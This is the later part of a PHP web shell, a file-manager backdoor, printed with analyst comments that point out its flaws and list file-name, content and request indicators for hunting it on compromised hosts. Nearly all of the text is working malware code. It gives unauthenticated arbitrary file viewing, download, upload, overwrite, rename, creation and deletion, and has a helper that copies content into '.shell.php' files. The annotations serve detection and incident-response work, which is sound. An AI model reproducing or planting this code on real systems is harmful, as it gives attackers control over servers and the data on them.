 * @return string|int "???" when filesize() fails, 0 for an empty file, otherwise the ts() string
 */
function getsize($s_f)
{
	$bytes = @filesize($s_f);
	if ($bytes === false) {
		return "???";
	}
	return ($bytes <= 0) ? 0 : ts($bytes);
}
/**
 * Copy the contents of $a into a new file named "$b.shell.php".
 *
 * Analyst note: nothing in this listing calls the function, so it is presumably left over from a
 * fuller variant. The ".shell.php" suffix is a concrete file-name indicator to search for on
 * hosts where this sample was found.
 *
 * @param string $a source passed to file_get_contents()
 * @param string $b destination path without the ".shell.php" suffix
 * @return void
 */
function kuchiyose($a,$b)
{
	$fgc=file_get_contents($a);
	$fp=fopen($b.".shell.php",'w');
	fwrite($fp,$fgc);
	fclose($fp);
}
/**
 * Print a link to "$f.shell.php" when that file exists.
 *
 * Companion to kuchiyose(); like it, no caller is visible in this listing.
 *
 * @param string $f path without the ".shell.php" suffix
 * @return void
 */
function cekk($f){
	if(file_exists($f.".shell.php")){
		echo "<b>Request done ! <a href='$f.shell.php' target='_blank'>Click here</a>";
	}
}
/**
 * Render the rename form and, when it is submitted, rename the entry.
 *
 * Both path components are request-controlled: $dir and $oldname come from the query string via the
 * dispatcher, the new name from the POST field `newname`. None is validated, so the operation is
 * not confined to $dir. $oldname is also echoed into the page without escaping.
 *
 * @param string $dir directory that contains the entry
 * @param string $oldname current name of the entry
 * @return void
 */
function renamefunc($dir,$oldname){
	echo "<center><h1>Rename : ".$oldname."</h1><br><form method='POST' class='in'>oldname : <input type='text' value='$oldname' class='in' readonly>";
	echo "Newname : <input type='text' name='newname' value='newname' class='in'><input type='submit' value='>>' name='s'></form></center>";
	// POST field `s` is the submit button; its presence triggers the rename.
	if(isset($_POST['s'])){
		rename($dir."/".$oldname,$dir."/".$_POST['newname']);
		// Client-side redirect back to the parent listing.
		echo "<meta http-equiv='refresh' content='0;url=?d=".dirname($dir)."'>";
	}
}
/**
 * Render an editor for a file and overwrite the file when the form is submitted.
 *
 * Analyst note: this is an arbitrary file write. The target path comes from the `d` and `f` query
 * parameters and the new content from the POST field `editfile`; existing application files can be
 * modified in place, so integrity-check neighbouring PHP files rather than only removing this one.
 * The confirmation string "Tersimpan" appears to be Indonesian for "saved".
 *
 * @param string $dir directory of the file
 * @param string $file file name inside $dir
 * @return void
 */
function editfunc($dir,$file){
	echo "<center><h1> Edit : ".$file."</h1><br><form method='POST'>";
	echo "<textarea name='editfile' cols='100' rows='40'>".htmlspecialchars(file_get_contents($dir."/".$file))."</textarea><br>";
	echo "<input type='submit' name='sbmt' value='>>submit<<' style='width:200px;'>";
	echo "</form>";
	if(isset($_POST['sbmt']))
	{
		// Mode 'w' truncates the file before the submitted content is written.
		$fp=fopen($dir."/".$file,'w');
		fwrite($fp,$_POST['editfile']);
		fclose($fp);
		echo "<br><b>Tersimpan @".date('D ,d m Y')."</b><br>";
	}
}
/**
 * Render the "new file" form and create the file when it is submitted.
 *
 * The file name comes from the POST field `filename` (form default "newfile.php") and is appended
 * to $dir without validation. touch() is used when available; otherwise the file is created with
 * the marker content "#new file 1945", which is a usable content indicator when hunting for files
 * dropped by this sample.
 *
 * @param string $dir directory in which the file is created (request-controlled)
 * @return void
 */
function berinamafunc($dir){
	echo "<center><h1>New file </h1><br><form method='POST' class='in'>";
	echo "Filename : <input type='text' name='filename' value='newfile.php'>";
	echo "<input type='submit' name='svi' value='>>'>";
	echo "</form>";
	if(isset($_POST['svi']))
	{
		if(function_exists('touch')){
			touch($dir."/".$_POST['filename']);
		}else{
			$fp=fopen($dir."/".$_POST['filename'],'w');
			fwrite($fp,'#new file 1945');
			fclose($fp);
		}
		// Redirect into the editor for the new file. Output has already been echoed above, so this
		// header only takes effect when output buffering is active.
		header('location:?d='.$dir.'&a=edit&f='.$_POST['filename']);
	}
}
/**
 * Render the "new directory" form and create the directory when it is submitted.
 *
 * The name comes from the POST field `mkdir` and is appended to the request-controlled $dir
 * without validation.
 *
 * @param string $dir parent directory
 * @return void
 */
function mkdirfunc($dir){
	echo "<center><h1>New directory</h1>";
	echo "<form method='POST' class='in'>New dir:<input type='text' name='mkdir'>";
	echo "<input type='submit' name='sbmt' value='>>'></form></center>";
	if(isset($_POST['sbmt']))
	{
		mkdir($dir."/".$_POST['mkdir']);
		// Client-side redirect back to the listing of $dir.
		echo "<meta http-equiv='refresh' content='0;url=?d=".$dir."'>";
	}

}
// $gp: working directory, taken from the `d` query parameter when present (see getpath()).
// It is echoed unescaped into every form action and link of the page below.
$gp=getpath();
// $y: php_uname() output (OS name, host name, kernel release, architecture). It is printed as the
// page title, which is why the analysis report shows the sandbox kernel string as the HTML title.
$y =php_uname();
?>
	<title><?php echo $y; ?></title>
</head>
<body>
</form>
<form method="post" class="in" enctype="multipart/form-data" action="?d=<?=$gp;?>&a=upload"> Upload file :<input type="file" name="filup[]" multiple="" style="border: 0"><input type="submit" name="upload" value=">>"></form><form method="post" action="?d=<?=$gp;?>&a=cmd" class="in"> Command : <input type="text" name="cmd"></form>
<form method="post" action="?d=<?=$gp;?>&a=up">
</form>
<a href="?d=<?=$gp;?>&a=up">Upload</a>
</div>
<hr>
<?php
// Breadcrumb: prints one link per component of the current path.
echo "Current Dir=|> ";
// NOTE(review): this reads the `path` query parameter, while every other part of the script uses
// `d`. None of the links generated by the page sets `path`, so the breadcrumb presumably always
// shows the PHP working directory rather than the directory being browsed.
if(isset($_GET['path'])){
$path = $_GET['path'];
}else{
$path = getcwd();
}
// Normalise Windows separators so the same split works on both platforms.
$path = str_replace('\\','/',$path);
$paths = explode('/',$path);

foreach($paths as $id=>$pat){
// A leading empty component means an absolute Unix path: emit the root link.
if($pat == '' && $id == 0){
$a = true;
echo '<a href="?d=/">/</a>';
continue;
}
if($pat == '') continue;
// Rebuild the path up to and including this component for the link target.
// Components are written into the page without HTML escaping.
echo '<a href="?d=';
for($i=0;$i<=$id;$i++){
echo "$paths[$i]";
if($i != $id) echo "/";
}
echo '">'.$pat.'</a>/';
}
						
// Action dispatcher. The `a` query parameter selects the operation, `d` the directory and `f` the
// file. Analyst notes:
//  - No branch in this listing checks a password, cookie or session before acting, so anyone who
//    can reach the URL can use every operation.
//  - Request indicators for log review: query strings carrying a=view, a=download, a=rename,
//    a=delete, a=upload, a=mkdir, a=touch or a=edit together with d= (and f=) against this script.
//  - The page also renders forms posting to a=cmd and a=up, but no branch below handles either.
if(empty($_GET['a']))
{
	?>
<table align="center" class="table">
	<th>Files</th><th>Size</th><th>owner:group</th><th>Permission</th><th>Action</th>
<?php
// No action requested: list the directory, sub-directories first and then files.
$dir=sedirs(getpath());
echo "<tr><td><a href=\"?d=".dirname($gp)."\">Current dir</a></td><td>--</td><td>--</td><td>--</td><td align=right><a href='?d=$gp&a=touch'>Newfile</a> | <a href='?d=$gp&a=mkdir'>newdir</a></td></tr>";
foreach($dir as $d1)
{if(!is_dir("$gp/$d1")||$d1=="."||$d1=="..")continue;
	// NOTE(review): the owner:group cell of this row interpolates $f1, which is only assigned by
	// the file loop further down. It looks like a copy/paste slip; directory rows would then show
	// the owner of "$gp/" instead of the sub-directory. Quirks like this help match variants.
	?>
	<tr><td>[<a href="?d=<?="$gp/$d1"?>"><?=$d1;?></a>]</td>
	<td><?=getsize("$gp/$d1");?></td>
	<td><?=getowner("$gp/$f1");?>:<?=getgroup("$gp/$f1");?></td>
	<td><?=getperms("$gp/$d1");?></td>
	<td align="right"><a href="?d=<?="$gp/$d1"?>&a=rename">Rename</a> | <a href="?d=<?="$gp/$d1"?>&a=delete">Delete</a></td>
	</tr>
	<?php
}
foreach($dir as $f1)
{
	if(!is_file("$gp/$f1")||$f1=="."||$f1=="..")continue;
	// File names from disk are written into the page and into link targets without escaping.
?>
	<tr><td><a href="?d=<?=$gp;?>&a=view&f=<?=$f1;?>"><?=$f1;?></a></td>
	<td><?=getsize("$gp/$f1");?></td>
	<td><?=getowner("$gp/$f1");?>:<?=getgroup("$gp/$f1");?></td>
	<td><?=getperms("$gp/$f1");?></td>
	<td align="right">
	<a href="?d=<?=$gp;?>&a=rename&f=<?=$f1;?>">Rename</a> |
	<a href="?d=<?="$gp/$f1";?>&a=delete">delete</a> |
	<a href="?d=<?=$gp;?>&a=edit&f=<?=$f1;?>">edit</a> |
	<a href="?d=<?=$gp;?>&a=download&f=<?=$f1;?>">download</a></td>
	</tr>
	<?php
}
?>
</table>
<?php
}else{
// An action was requested. All three parameters are taken from the query string as-is;
// the @ only hides the notice for a missing key.
@$a=$_GET['a'];
@$f=$_GET['f'];
@$d=$_GET['d'];
// view / download: read an arbitrary file named by d and f.
if($a=="view")
{viewfilefunc($d."/".$f);}elseif($a=="download"){downloads($d."/".$f);}
// logout: clears a cookie named md5(Host header). Nothing in this listing ever sets or checks that
// cookie, so the branch is presumably a remnant of a password-protected variant.
elseif($a=="logout"){if(setcookie(md5($_SERVER['HTTP_HOST']),""))
	echo "<script>alert('See You Next time !');window.location.href='????'</script>";}

// rename: with f set, d is the directory; without f, d is the full path of the entry itself.
elseif($a=="rename"){$ff=(isset($_GET['f']) ? $_GET['f'] : basename($_GET['d']));$gdd=(isset($_GET['f'])) ? $_GET['d'] : dirname($_GET['d']); renamefunc($gdd,$ff);}
// delete: d is passed unmodified to delete(), which can fall through to a shell `rm -rf`.
elseif($a=="delete"){delete($_GET['d']);echo "<meta http-equiv='refresh' content='0;url=?d=".dirname($_GET['d'])."'>";}
// upload: every file of the multi-file field `filup` is stored under d with its client-supplied name.
elseif($a=="upload"){
	$fil=array_upload($_FILES['filup']); foreach($fil as $filup)
	{
		// The client-supplied name is used verbatim as the destination file name.
		$filoc=$d."/".$filup['name'];
		if(upload($filup['tmp_name'],$filoc))
		{
			echo "<font color=lime>Successfully upload -> <a href='?d=".$d."&a=view&f=".$filup['name']."'>".$filoc."</a></font><br>";
		}else{
			echo "<font color=red>Failed upload -> ".$filoc."</font><br>";
		}
	}
}
// mkdir / touch / edit: create directories and files, and overwrite file contents, under d.
elseif($a=="mkdir"){mkdirfunc($d);}
elseif($a=="touch"){berinamafunc($d);}
elseif($a=="edit"){editfunc($_GET['d'],$_GET['f']);}



}
?>